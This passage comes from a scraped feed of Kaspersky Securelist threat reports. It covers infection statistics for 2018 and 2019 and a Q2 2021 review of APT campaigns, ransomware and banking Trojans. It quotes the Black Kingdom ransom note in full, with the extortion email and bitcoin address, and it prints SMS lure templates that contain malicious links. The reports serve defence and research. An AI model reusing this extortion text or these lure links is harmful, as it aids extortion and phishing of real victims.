were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-08-12T10:37:29", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/12091857/abstract_malware_report-990x400.jpg)\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01-1024x430.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01-1024x272.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08-1024x629.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01-1024x341.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach "re-branded" version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12-1024x762.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families-1024x1024.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-1024x952.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:14", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | 